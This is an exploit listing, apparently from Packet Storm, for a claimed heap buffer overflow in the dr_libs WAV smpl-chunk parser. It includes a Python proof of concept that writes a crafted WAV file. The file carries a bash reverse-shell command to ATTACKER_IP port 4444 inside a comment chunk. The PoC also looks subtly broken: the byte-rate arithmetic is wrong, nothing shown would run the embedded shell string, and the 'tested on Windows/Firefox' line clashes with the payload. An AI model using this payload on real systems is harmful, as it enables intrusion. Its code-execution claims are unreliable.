Share
## https://sploitus.com/exploit?id=PACKETSTORM:216758
=============================================================================================================================================
    | # Title     : dr_libs โ‰ค 0.14.4 via crafted WAV smpl chunk Heap Buffer Overflow                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/mackron/dr_libs/                                                                                         |
    =============================================================================================================================================
    
    [+] Summary    : A heap buffer overflow exists in the function drwav__read_smpl_to_metadata_obj() when processing WAV files with a crafted smpl chunk. 
                     The vulnerability arises due to a mismatch between sampleLoopCount validation in pass 1 and unconditional processing in pass 2, allowing 36 bytes of attacker-controlled 
    				 data to overflow heap allocations via any drwav_init_*_with_metadata() call on untrusted input.
    
    Affected versions: 0.14.4 and earlier
    
    Fixed in: commit 8a7258c
    
    Impact: Memory corruption, potential arbitrary code execution
    
    Trigger: WAV files with manipulated smpl chunk metadata
    
    Mitigation: Update dr_libs to a version newer than 0.14.4.
    			  
    [+] POC   :  
    
    import struct
    
    
    def pad_even(data):
        if len(data) % 2:
            data += b'\x00'
        return data
    
    
    def generate_wav():
    
        ATTACKER_IP = "192.168.1.5"
        PORT = "4444"
    
        cmd = f"bash -c 'sh -i >& /dev/tcp/{ATTACKER_IP}/{PORT} 0>&1'\x00"
        cmd_bytes = cmd.encode()
    
        sample_rate = 44100
        channels = 1
        bits = 16
    
        byte_rate = sample_rate * channels * bits 
        block_align = channels * bits  
    
        fmt_chunk = (
            b'fmt ' +
            struct.pack('<IHHIIHH',
                16,
                1,
                channels,
                sample_rate,
                byte_rate,
                block_align,
                bits
            )
        )
    
        payload = struct.pack('<9I',0,0,0,60,0,0,0,0,0)
    
        smpl_chunk = b'smpl' + struct.pack('<I', len(payload)) + payload
        smpl_chunk = pad_even(smpl_chunk)
    
        audio_data = b'\x00\x00' * 44100
        data_chunk = b'data' + struct.pack('<I', len(audio_data)) + audio_data
        data_chunk = pad_even(data_chunk)
    
        comment = cmd_bytes
        comment_padded = pad_even(comment)
    
        info_chunk = b'ICMT' + struct.pack('<I', len(comment)) + comment_padded
    
        meta_data = b'INFO' + info_chunk
        meta_chunk = b'LIST' + struct.pack('<I', len(meta_data)) + meta_data
        meta_chunk = pad_even(meta_chunk)
    
        wave_data = b'WAVE' + fmt_chunk + data_chunk + smpl_chunk + meta_chunk
    
        riff = b'RIFF' + struct.pack('<I', len(wave_data)) + wave_data
    
        with open("fixed.wav", "wb") as f:
            f.write(riff)
    
        print("[+] WAV file generated successfully")
    
    
    generate_wav()
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================